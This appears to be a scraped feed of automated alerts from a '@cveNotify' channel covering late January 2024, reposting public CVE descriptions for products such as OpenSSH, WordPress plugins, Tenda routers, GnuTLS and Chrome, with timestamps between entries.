🚨 CVE-2023-51767OpenSSH through 9.6, when common types of DRAM are used, might allow row hammer attacks (for authentication bypass) because the integer value of authenticated in mm_answer_authpassword does not resist flips of a single bit. NOTE: this is applicable to a certain threat model of attacker-victim co-location in which the attacker has user privileges.🎖@cveNotify |
|
| 2024-01-29 20:07:24 |
🚨 CVE-2021-43803Next.js is a React framework. In versions of Next.js prior to 12.0.5 or 11.1.3, invalid or malformed URLs could lead to a server crash. In order to be affected by this issue, the deployment must use Next.js versions above 11.1.0 and below 12.0.5, Node.js above 15.0.0, and next start or a custom server. Deployments on Vercel are not affected, along with similar environments where invalid requests are filtered before reaching Next.js. Versions 12.0.5 and 11.1.3 contain patches for this issue.🎖@cveNotify |
|
| 2024-01-29 19:37:32 |
🚨 CVE-2024-0783A vulnerability was found in Project Worlds Online Admission System 1.0 and classified as critical. This issue affects some unknown processing of the file documents.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251699.🎖@cveNotify |
|
| 2024-01-29 19:37:26 |
🚨 CVE-2024-0204Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.🎖@cveNotify |
|
| 2024-01-29 19:37:25 |
🚨 CVE-2024-23752GenerateSDFPipeline in synthetic_dataframe in PandasAI (aka pandas-ai) through 1.5.17 allows attackers to trigger the generation of arbitrary Python code that is executed by SDFCodeExecutor. An attacker can create a dataframe that provides an English language specification of this Python code. NOTE: the vendor previously attempted to restrict code execution in response to a separate issue, CVE-2023-39660.🎖@cveNotify |
|
| 2024-01-29 19:37:24 |
🚨 CVE-2023-6524The MapPress Maps for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the map title parameter in all versions up to and including 2.88.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with contributor access or higher to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-01-29 19:07:26 |
🚨 CVE-2023-42935An authentication issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.6.4. A local attacker may be able to view the previous logged in user’s desktop from the fast user switching screen.🎖@cveNotify |
|
| 2024-01-29 19:07:25 |
🚨 CVE-2024-21319Microsoft Identity Denial of service vulnerability🎖@cveNotify |
|
| 2024-01-29 18:37:25 |
🚨 CVE-2023-42937A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in iOS 16.7.5 and iPadOS 16.7.5, watchOS 10.2, macOS Ventura 13.6.4, macOS Sonoma 14.2, macOS Monterey 12.7.3, iOS 17.2 and iPadOS 17.2. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-01-29 18:37:24 |
🚨 CVE-2023-24135Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a command injection vulnerability in the function formWriteFacMac. This vulnerability allows attackers to execute arbitrary commands via manipulation of the mac parameter.🎖@cveNotify |
|
| 2024-01-29 18:07:32 |
🚨 CVE-2024-22662TOTOLINK A3700R_V9.1.2u.6165_20211012 has a stack overflow vulnerability via setParentalRules🎖@cveNotify |
|
| 2024-01-29 18:07:26 |
🚨 CVE-2024-22705An issue was discovered in ksmbd in the Linux kernel before 6.6.10. smb2_get_data_area_len in fs/smb/server/smb2misc.c can cause an smb_strndup_from_utf16 out-of-bounds access because the relationship between Name data and CreateContexts data is mishandled.🎖@cveNotify |
|
| 2024-01-29 18:07:25 |
🚨 CVE-2024-23676In Splunk versions below 9.0.8 and 9.1.3, the “mrollup” SPL command lets a low-privileged user view metrics on an index that they do not have permission to view. This vulnerability requires user interaction from a high-privileged user to exploit.🎖@cveNotify |
|
| 2024-01-29 18:07:24 |
🚨 CVE-2024-23675In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store (KV Store) improperly handles permissions for users that use the REST application programming interface (API). This can potentially result in the deletion of KV Store collections.🎖@cveNotify |
|
| 2024-01-29 17:37:32 |
🚨 CVE-2020-36772CloudLinux CageFS 7.0.8-2 or below insufficiently restricts file paths supplied to the sendmail proxy command. This allows local users to read and write arbitrary files outside the CageFS environment in a limited way.🎖@cveNotify |
|
| 2024-01-29 17:37:26 |
🚨 CVE-2020-36771CloudLinux CageFS 7.1.1-1 or below passes the authentication token as command line argument. In some configurations this allows local users to view it via the process list and gain code execution as another user.🎖@cveNotify |
|
| 2024-01-29 17:37:25 |
🚨 CVE-2024-20277A vulnerability in the web-based management interface of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, remote attacker to perform a command injection and elevate privileges to root. This vulnerability is due to insufficient validation of user-supplied input for the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP packet to the affected device. A successful exploit could allow the attacker to execute arbitrary commands and elevate privileges to root.🎖@cveNotify |
|
| 2024-01-29 17:37:24 |
🚨 CVE-2024-0553A vulnerability was found in GnuTLS. The response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from the response times of ciphertexts with correct PKCS#1 v1.5 padding. This issue may allow a remote attacker to perform a timing side-channel attack in the RSA-PSK key exchange, potentially leading to the leakage of sensitive data. CVE-2024-0553 is designated as an incomplete resolution for CVE-2023-5981.🎖@cveNotify |
|
| 2024-01-29 17:07:25 |
🚨 CVE-2024-23750MetaGPT through 0.6.4 allows the QaEngineer role to execute arbitrary code because RunCode.run_script() passes shell metacharacters to subprocess.Popen.🎖@cveNotify |
|
| 2024-01-29 17:07:24 |
🚨 CVE-2024-22416pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade.🎖@cveNotify |
|
| 2024-01-29 16:37:25 |
🚨 CVE-2024-21612An Improper Handling of Syntactically Invalid Structure vulnerability in Object Flooding Protocol (OFP) service of Juniper Networks Junos OS Evolved allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS).On all Junos OS Evolved platforms, when specific TCP packets are received on an open OFP port, the OFP crashes leading to a restart of Routine Engine (RE). Continuous receipt of these specific TCP packets will lead to a sustained Denial of Service (DoS) condition.This issue affects:Juniper Networks Junos OS Evolved * All versions earlier than 21.2R3-S7-EVO; * 21.3 versions earlier than 21.3R3-S5-EVO ; * 21.4 versions earlier than 21.4R3-S5-EVO; * 22.1 versions earlier than 22.1R3-S4-EVO; * 22.2 versions earlier than 22.2R3-S3-EVO ; * 22.3 versions earlier than 22.3R3-EVO; * 22.4 versions earlier than 22.4R2-EVO, 22.4R3-EVO.🎖@cveNotify |
|
| 2024-01-29 16:37:24 |
🚨 CVE-2023-5981A vulnerability was found that the response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding.🎖@cveNotify |
|
| 2024-01-29 16:07:43 |
🚨 CVE-2024-0885A vulnerability classified as problematic has been found in SpyCamLizard 1.230. Affected is an unknown function of the component HTTP GET Request Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252036.🎖@cveNotify |
|
| 2024-01-29 16:07:36 |
🚨 CVE-2023-52328Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.Please note this vulnerability is similar, but not identical to CVE-2023-52329.🎖@cveNotify |
|
| 2024-01-29 16:07:35 |
🚨 CVE-2023-52327Certain dashboard widgets on Trend Micro Apex Central (on-premise) are vulnerable to cross-site scripting (XSS) attacks that may allow an attacker to achieve remote code execution on affected servers.Please note this vulnerability is similar, but not identical to CVE-2023-52328.🎖@cveNotify |
|
| 2024-01-29 16:07:31 |
🚨 CVE-2023-49657A stored cross-site scripting (XSS) vulnerability exists in Apache Superset before 3.0.3. An authenticated attacker with create/update permissions on charts or dashboards could store a script or add a specific HTML snippet that would act as a stored XSS.For 2.X versions, users should change their config to include:TALISMAN_CONFIG = { "content_security_policy": { "base-uri": ["'self'"], "default-src": ["'self'"], "img-src": ["'self'", "blob:", "data:"], "worker-src": ["'self'", "blob:"], "connect-src": [ "'self'", " https://api.mapbox.com" https://api.mapbox.com" ;, " https://events.mapbox.com" https://events.mapbox.com" ;, ], "object-src": "'none'", "style-src": [ "'self'", "'unsafe-inline'", ], "script-src": ["'self'", "'strict-dynamic'"], }, "content_security_policy_nonce_in": ["script-src"], "force_https": False, "session_cookie_secure": False,}🎖@cveNotify |
|
| 2024-01-29 16:07:30 |
🚨 CVE-2024-22771Improper Input Validation in Hitron Systems DVR LGUVR-4H 1.02~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW.🎖@cveNotify |
|
| 2024-01-29 16:07:26 |
🚨 CVE-2024-22769Improper Input Validation in Hitron Systems DVR HVR-8781 1.03~4.02 allows an attacker to cause network attack in case of using defalut admin ID/PW.🎖@cveNotify |
|
| 2024-01-29 16:07:25 |
🚨 CVE-2024-23744An issue was discovered in Mbed TLS 3.5.1. There is persistent handshake denial if a client sends a TLS 1.3 ClientHello without extensions.🎖@cveNotify |
|
| 2024-01-29 16:07:24 |
🚨 CVE-2023-52353An issue was discovered in Mbed TLS through 3.5.1. In mbedtls_ssl_session_reset, the maximum negotiable TLS version is mishandled. For example, if the last connection negotiated TLS 1.2, then 1.2 becomes the new maximum.🎖@cveNotify |
|
| 2024-01-29 15:37:43 |
🚨 CVE-2023-6278The Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo WordPress plugin before 2.2.25 does not sanitise and escape the biteship_error and biteship_message parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2024-01-29 15:37:42 |
🚨 CVE-2023-5956The Wp-Adv-Quiz WordPress plugin through 1.0.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).🎖@cveNotify |
|
| 2024-01-29 15:37:41 |
🚨 CVE-2023-5943The Wp-Adv-Quiz WordPress plugin before 1.0.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed.🎖@cveNotify |
|
| 2024-01-29 15:07:24 |
🚨 CVE-2024-23751LlamaIndex (aka llama_index) through 0.9.34 allows SQL injection via the Text-to-SQL feature in NLSQLTableQueryEngine, SQLTableRetrieverQueryEngine, NLSQLRetriever, RetrieverQueryEngine, and PGVectorSQLQueryEngine. For example, an attacker might be able to delete this year's student records via "Drop the Students table" within English language input.🎖@cveNotify |
|
| 2024-01-29 14:37:38 |
🚨 CVE-2024-0809Inappropriate implementation in Autofill in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to bypass Autofill restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2024-01-29 14:37:32 |
🚨 CVE-2024-0808Integer underflow in WebUI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to potentially exploit heap corruption via a malicious file. (Chromium security severity: High)🎖@cveNotify |
|
| 2024-01-29 14:37:31 |
🚨 CVE-2024-0805Inappropriate implementation in Downloads in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-01-29 14:37:30 |
🚨 CVE-2024-0804Insufficient policy enforcement in iOS Security UI in Google Chrome prior to 121.0.6167.85 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2024-01-29 14:37:27 |
🚨 CVE-2024-22113Open redirect vulnerability in Access analysis CGI An-Analyzer released in 2023 December 31 and earlier allows a remote unauthenticated attacker to redirect users to arbitrary websites and conduct phishing attacks via a specially crafted URL.🎖@cveNotify |
|
| 2024-01-29 14:37:26 |
🚨 CVE-2024-0771A vulnerability has been found in Nsasoft Product Key Explorer 4.0.9 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251671. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-29 14:37:25 |
🚨 CVE-2023-49082aiohttp is an asynchronous HTTP client/server framework for asyncio and Python. Improper validation makes it possible for an attacker to modify the HTTP request (e.g. insert a new header) or even create a new HTTP request if the attacker controls the HTTP method. The vulnerability occurs only if the attacker can control the HTTP method (GET, POST etc.) of the request. If the attacker can control the HTTP version of the request it will be able to modify the request (request smuggling). This issue has been patched in version 3.9.0.🎖@cveNotify |
|
| 2024-01-29 14:07:25 |
🚨 CVE-2024-0772A vulnerability was found in Nsasoft ShareAlarmPro 2.1.4 and classified as problematic. Affected by this issue is some unknown functionality of the component Registration Handler. The manipulation of the argument Name/Key leads to memory corruption. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251672. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-29 14:07:24 |
🚨 CVE-2024-0770A vulnerability, which was classified as critical, was found in European Chemicals Agency IUCLID 7.10.3 on Windows. Affected is an unknown function of the file iuclid6.exe of the component Desktop Installer. The manipulation leads to incorrect default permissions. The attack needs to be approached locally. VDB-251670 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-29 13:37:25 |
🚨 CVE-2023-29055In Apache Kylin version 2.0.0 to 4.0.3, there is a Server Config web interface that displays the content of file 'kylin.properties', that may contain serverside credentials. When the kylin service runs over HTTP (or other plain text protocol), it is possible for network sniffers to hijack the HTTP payload and get access to the content of kylin.properties and potentially the containing credentials.To avoid this threat, users are recommended to * Always turn on HTTPS so that network payload is encrypted. * Avoid putting credentials in kylin.properties, or at least not in plain text. * Use network firewalls to protect the serverside such that it is not accessible to external attackers. * Upgrade to version Apache Kylin 4.0.4, which filters out the sensitive content that goes to the Server Config web interface.🎖@cveNotify |
|
| 2024-01-29 12:37:24 |
🚨 CVE-2023-5378Improper Input Validation vulnerability in MegaBIP and already unsupported SmodBIP software allows for Stored XSS.This issue affects SmodBIP in all versions and MegaBIP in versions up to 4.36.2 (newer versions were not tested; the vendor has not confirmed fixing the vulnerability).🎖@cveNotify |
|
| 2024-01-29 11:37:24 |
🚨 CVE-2023-46838Transmit requests in Xen's virtual network protocol can consist ofmultiple parts. While not really useful, except for the initial partany of them may be of zero length, i.e. carry no data at all. Besides acertain initial portion of the to be transferred data, these parts aredirectly translated into what Linux calls SKB fragments. Such convertedrequest parts can, when for a particular SKB they are all of lengthzero, lead to a de-reference of NULL in core networking code.🎖@cveNotify |
|
| 2024-01-29 10:37:25 |
🚨 CVE-2024-23790Improper Input Validation vulnerability in the upload functionality for user avatars allows functionality misuse due to missing check of filetypes.This issue affects OTRS: from 7.0.X through 7.0.48, from 8.0.X through 8.0.37, from 2023 through 2023.1.1.🎖@cveNotify |
|
| 2024-01-29 10:37:24 |
🚨 CVE-2024-0212The Cloudflare Wordpress plugin was found to be vulnerable to improper authentication. The vulnerability enables attackers with a lower privileged account to access data from the Cloudflare API.🎖@cveNotify |
|
| 2024-01-29 07:37:26 |
🚨 CVE-2024-0567A vulnerability was found in GnuTLS, where a cockpit (which uses gnuTLS) rejects a certificate chain with distributed trust. This issue occurs when validating a certificate chain with cockpit-certificate-ensure. This flaw allows an unauthenticated, remote client or attacker to initiate a denial of service attack.🎖@cveNotify |
|
| 2024-01-29 07:37:25 |
🚨 CVE-2023-5981A vulnerability was found that the response times to malformed ciphertexts in RSA-PSK ClientKeyExchange differ from response times of ciphertexts with correct PKCS#1 v1.5 padding.🎖@cveNotify |
|
| 2024-01-29 07:37:24 |
🚨 CVE-2023-40032libvips is a demand-driven, horizontally threaded image processing library. A specially crafted SVG input can cause libvips versions 8.14.3 or earlier to segfault when attempting to parse a malformed UTF-8 character. Users should upgrade to libvips version 8.14.4 (or later) when processing untrusted input.🎖@cveNotify |
|
| 2024-01-29 06:37:24 |
🚨 CVE-2023-6816A flaw was found in X.Org server. Both DeviceFocusEvent and the XIQueryPointer reply contain a bit for each logical button currently down. Buttons can be arbitrarily mapped to any value up to 255, but the X.Org Server was only allocating space for the device's particular number of buttons, leading to a heap overflow if a bigger value was used.🎖@cveNotify |
|
| 2024-01-29 04:37:24 |
🚨 CVE-2024-24736The POP3 service in YahooPOPs (aka YPOPs!) 1.6 allows a remote denial of service (reboot) via a long string to TCP port 110, a related issue to CVE-2004-1558.🎖@cveNotify |
|
| 2024-01-29 03:37:24 |
🚨 CVE-2024-0996A vulnerability classified as critical has been found in Tenda i9 1.0.0.9(4122). This affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252261 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-29 02:37:25 |
🚨 CVE-2024-0994A vulnerability was found in Tenda W6 1.0.0.9(4122). It has been declared as critical. Affected by this vulnerability is the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252259. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-29 02:37:24 |
🚨 CVE-2024-0993A vulnerability was found in Tenda i6 1.0.0.9(3857). It has been classified as critical. Affected is the function formWifiMacFilterGet of the file /goform/WifiMacFilterGet of the component httpd. The manipulation of the argument index leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-252258 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-29 01:37:25 |
🚨 CVE-2024-0991A vulnerability has been found in Tenda i6 1.0.0.9(3857) and classified as critical. This vulnerability affects the function formSetCfm of the file /goform/setcfm of the component httpd. The manipulation of the argument funcpara1 leads to stack-based buffer overflow. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252256. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-29 01:37:24 |
🚨 CVE-2024-0989A vulnerability, which was classified as problematic, has been found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this issue is the function del_sn_db of the file /application/index/controller/Service.php. The manipulation of the argument file leads to path traversal: '../filedir'. The exploit has been disclosed to the public and may be used. VDB-252254 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-29 00:37:25 |
🚨 CVE-2024-0988A vulnerability classified as critical was found in Sichuan Yougou Technology KuERP up to 1.0.4. Affected by this vulnerability is the function checklogin of the file /application/index/common.php. The manipulation of the argument App_User_id/App_user_Token leads to improper authentication. The exploit has been disclosed to the public and may be used. The identifier VDB-252253 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-29 00:37:24 |
🚨 CVE-2024-0986A vulnerability was found in Issabel PBX 4.0.0. It has been rated as critical. This issue affects some unknown processing of the file /index.php?menu=asterisk_cli of the component Asterisk-Cli. The manipulation of the argument Command leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252251. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-28 23:37:24 |
🚨 CVE-2024-23782Cross-site scripting vulnerability exists in a-blog cms Ver.3.1.x series versions prior to Ver.3.1.7, Ver.3.0.x series versions prior to Ver.3.0.29, Ver.2.11.x series versions prior to Ver.2.11.58, Ver.2.10.x series versions prior to Ver.2.10.50, and Ver.2.9.0 and earlier versions. If this vulnerability is exploited, a user with a contributor or higher privilege may execute an arbitrary script on the web browser of the user who accessed the website using the product.🎖@cveNotify |
|
| 2024-01-28 13:37:24 |
🚨 CVE-2023-6200A race condition was found in the Linux Kernel. Under certain conditions, an unauthenticated attacker from an adjacent network could send an ICMPv6 router advertisement packet, causing arbitrary code execution.🎖@cveNotify |
|
| 2024-01-28 12:37:24 |
🚨 CVE-2024-0841A null pointer dereference flaw was found in the hugetlbfs_fill_super function in the Linux kernel hugetlbfs (HugeTLB pages) functionality. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.🎖@cveNotify |
|
| 2024-01-28 09:37:25 |
🚨 CVE-2024-0920A vulnerability was found in TRENDnet TEW-822DRE 1.03B02. It has been declared as critical. This vulnerability affects unknown code of the file /admin_ping.htm of the component POST Request Handler. The manipulation of the argument ipv4_ping/ipv6_ping leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252124. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-28 09:37:24 |
🚨 CVE-2024-0918A vulnerability was found in TRENDnet TEW-800MB 1.0.1.0 and classified as critical. Affected by this issue is some unknown functionality of the component POST Request Handler. The manipulation of the argument DeviceURL leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252122 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-01-28 04:37:24 |
🚨 CVE-2023-42465Sudo before 1.9.15 might allow row hammer attacks (for authentication bypass or privilege escalation) because application logic sometimes is based on not equaling an error value (instead of equaling a success value), and because the values do not resist flips of a single bit.🎖@cveNotify |
|
| 2024-01-28 03:37:25 |
🚨 CVE-2024-23742An issue in Loom on macOS version 0.196.1 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.🎖@cveNotify |
|
| 2024-01-28 03:37:24 |
🚨 CVE-2024-23739An issue in Discord for macOS version 0.0.291 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.🎖@cveNotify |
|
| 2024-01-28 02:37:24 |
🚨 CVE-2024-23743An issue in Notion for macOS version 3.1.0 and before, allows remote attackers to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments components.🎖@cveNotify |
|
| 2024-01-28 01:37:24 |
🚨 CVE-2024-23738An issue in Postman version 10.22 and before on macOS allows a remote attacker to execute arbitrary code via the RunAsNode and enableNodeClilnspectArguments settings.🎖@cveNotify |
|
| 2024-01-27 22:37:24 |
🚨 CVE-2024-22368The Spreadsheet::ParseXLSX package before 0.28 for Perl can encounter an out-of-memory condition during parsing of a crafted XLSX document. This occurs because the memoize implementation does not have appropriate constraints on merged cells.🎖@cveNotify |
|
| 2024-01-27 20:04:32 |
None |
|
| 2024-01-27 13:37:24 |
🚨 CVE-2024-0962A vulnerability was found in obgm libcoap 4.3.4. It has been rated as critical. Affected by this issue is the function get_split_entry of the file src/coap_oscore.c of the component Configuration File Handler. The manipulation leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. VDB-252206 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-27 12:37:24 |
🚨 CVE-2024-0960A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file \ai_flow\cli\commands\workflow_command.py. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-01-27 11:37:24 |
🚨 CVE-2024-0959A vulnerability was found in StanfordVL GibsonEnv 0.3.1. It has been classified as critical. Affected is the function cloudpickle.load of the file gibson\utils\pposgd_fuse.py. The manipulation leads to deserialization. It is possible to launch the attack remotely. The complexity of an attack is rather high. The exploitability is told to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-252204.🎖@cveNotify |
|
| 2024-01-27 09:37:24 |
🚨 CVE-2023-22084Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 5.7.43 and prior, 8.0.34 and prior and 8.1.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2024-01-27 07:37:24 |
🚨 CVE-2024-22861Integer overflow vulnerability in FFmpeg before n6.1, allows attackers to cause a denial of service (DoS) via the avcodec/osq module.🎖@cveNotify |
|
| 2024-01-27 06:37:29 |
🚨 CVE-2024-22862Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the JJPEG XL Parser.🎖@cveNotify |
|
| 2024-01-27 06:37:26 |
🚨 CVE-2024-22860Integer overflow vulnerability in FFmpeg before n6.1, allows remote attackers to execute arbitrary code via the jpegxl_anim_read_packet component in the JPEG XL Animation decoder.🎖@cveNotify |
|
| 2024-01-27 06:37:25 |
🚨 CVE-2024-0618The Contact Form Plugin – Fastest Contact Form Builder Plugin for WordPress by Fluent Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported form titles in all versions up to, and including, 5.1.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-01-27 06:37:24 |
🚨 CVE-2023-48201Cross Site Scripting (XSS) vulnerability in Sunlight CMS v.8.0.1, allows remote authenticated attackers to execute arbitrary code and escalate privileges via a crafted script to the Content text editor component.🎖@cveNotify |
|
| 2024-01-27 05:37:24 |
🚨 CVE-2024-0697The Backuply – Backup, Restore, Migrate and Clone plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.2.3 via the node_id parameter in the backuply_get_jstree function. This makes it possible for attackers with administrator privileges or higher to read the contents of arbitrary files on the server, which can contain sensitive information.🎖@cveNotify |
|
| 2024-01-27 04:37:25 |
🚨 CVE-2024-0667The Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.15.21. This is due to missing or incorrect nonce validation on the 'execute' function. This makes it possible for unauthenticated attackers to execute arbitrary methods in the 'BoosterController' class via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-01-27 04:37:24 |
🚨 CVE-2023-6497The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the automatic redirect URL setting in all versions up to and including 4.7.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-01-27 04:07:25 |
🚨 CVE-2024-23224The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.3, macOS Ventura 13.6.4. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-01-27 04:07:24 |
🚨 CVE-2024-23223A privacy issue was addressed with improved handling of files. This issue is fixed in macOS Sonoma 14.3, watchOS 10.3, tvOS 17.3, iOS 17.3 and iPadOS 17.3. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2024-01-27 03:37:25 |
🚨 CVE-2024-22195Jinja is an extensible templating engine. Special placeholders in the template allow writing code similar to Python syntax. It is possible to inject arbitrary HTML attributes into the rendered HTML template, potentially leading to Cross-Site Scripting (XSS). The Jinja `xmlattr` filter can be abused to inject arbitrary HTML attribute keys and values, bypassing the auto escaping mechanism and potentially leading to XSS. It may also be possible to bypass attribute validation checks if they are blacklist-based.🎖@cveNotify |
|
| 2024-01-27 03:37:24 |
🚨 CVE-2023-43361Buffer Overflow vulnerability in Vorbis-tools v.1.4.2 allows a local attacker to execute arbitrary code and cause a denial of service during the conversion of wav files to ogg files.🎖@cveNotify |
|
| 2024-01-27 01:37:24 |
🚨 CVE-2023-44000An issue in Otakara lapis totuka mini-app on Line v13.6.1 allows attackers to send crafted malicious notifications via leakage of the channel access token.🎖@cveNotify |
|
| 2024-01-27 01:07:32 |
🚨 CVE-2024-23874A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/companymodify.php, in the address1 parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-01-27 01:07:25 |
🚨 CVE-2024-23856A vulnerability has been reported in Cups Easy (Purchase & Inventory), version 1.0, whereby user-controlled inputs are not sufficiently encoded, resulting in a Cross-Site Scripting (XSS) vulnerability via /cupseasylive/itemlist.php, in the description parameter. Exploitation of this vulnerability could allow a remote attacker to send a specially crafted URL to an authenticated user and steal their session cookie credentials.🎖@cveNotify |
|
| 2024-01-27 01:07:24 |
